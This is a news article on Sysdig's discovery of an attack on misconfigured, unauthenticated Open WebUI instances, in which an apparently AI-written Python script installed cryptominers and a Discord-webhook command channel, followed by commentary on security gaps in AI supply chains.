Sysdig Reveals Discovery of Cyberattack Aimed at Tool to Build AI Apps
Sysdig today disclosed an example of how a tool for training artificial intelligence (AI) models was compromised by a cyberattack that led to the injection of malicious code and the downloading of cryptominers.
The Sysdig Threat Research Team (TRT) discovered an attack aimed at a misconfigured instance of Open WebUI, a tool widely used by data scientists to upload Python scripts to large language models (LLMs) that, in addition to lacking authentication requirements, also provided access to a full set of administrative privileges.
More interestingly still, the malicious Python script uploaded into the tool appears to have been developed using some type of AI coding tool.
Michael Clark, director of threat research for Sysdig, said after reviewing the code, it became apparent that it was constructed in a way that no human would have done, but there were clear signs it had been reviewed to some degree by a human.
Finally, the Sysdig report also notes that for reasons unknown, the variant of this attack that was developed to exploit Open WebUI running on Windows is not only more sophisticated than the same cyberattack that was crafted for that tool running on Linux, but it is also almost undetectable.
Like most attacks involving malware, this attack also included a command and control server. In this case, it was linked via a webhook interface to a Discord server.
It’s not clear how many misconfigured instances of Open WebUI there might be, but Sysdig notes that using a Shodan scanning tool, it was able to discover 17,000 instances of the tool that are exposed to the Internet.
The challenge is that most of these tools were configured by data scientists who typically have limited cybersecurity expertise, so the probability that many of these tools are misconfigured is high. Additionally, it’s also clear that cybercriminals have determined that AI applications are potentially among the richest targets available to them, which means they are now actively scanning for misconfigurations to exploit, noted Clark.
In this instance, cybercriminals appear to be more intent on illicit crypto mining using the infrastructure allocated to LLMs, but given the command and control software they installed, there was a clear intent to repeatedly access the underlying IT infrastructure. Additionally, cybercriminals, once they gain access to an IT environment, are well known for selling the exploit to other cybercriminals that may have more nefarious ambitions.
More troubling still, the Sysdig report makes it clear that cybercriminals are now using AI tools to craft attacks aimed at the software supply chain being used to build and deploy AI applications. The degree to which those software supply chains are secure will naturally vary from one organization to another, but if history is any guide, there will be many breaches involving AI tools and platforms ahead.
Ideally, cybersecurity teams should be proactively addressing those issues now rather than after a catastrophic event has occurred. Unfortunately, most teams building AI applications are much more obsessed with getting models to work. Security issues are all too often a secondary concern.
Hopefully, the number of security incidents involving AI will be kept to a bare minimum once there is greater recognition of the potential threats. Of course, no one wants to be the first victim that everyone learns what not to do from, but at this point, it’s more a question of when, rather than if, there will be a major AI breach.